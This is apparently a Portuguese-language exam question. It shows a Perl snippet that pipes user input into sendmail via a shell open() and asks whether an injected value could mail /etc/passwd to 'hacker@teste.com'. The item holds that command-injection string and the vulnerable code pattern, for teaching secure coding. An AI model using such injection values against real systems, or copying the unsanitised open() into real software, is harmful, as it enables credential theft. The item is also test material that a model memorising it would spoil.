1 open (HTML, "-")
2 or exec ("/usr/bin/txt2html", "/usr/stats/$ username");
3 print while <HTML>;
.
.
4 $ mail_to = &get_name_from_input;
5 open (MAIL," /usr/lib/sendmail $ mail_to");
6 print MAIL "To: $ mailto\nFrom: me\n\nHi there!\n";
7 close MAIL;
Considerando o trecho de código em Perl acima, julgue o item a seguir.
Nas linhas de 4 a 7, é mostrado um trecho de código no qual, se a variável $ mail_to tivesse o valor a@x.com; mail hacker@teste.com</etc/passwd permitiria que o arquivo de passwords fosse enviado a um usuário malicioso.
Provas
Questão presente nas seguintes provas
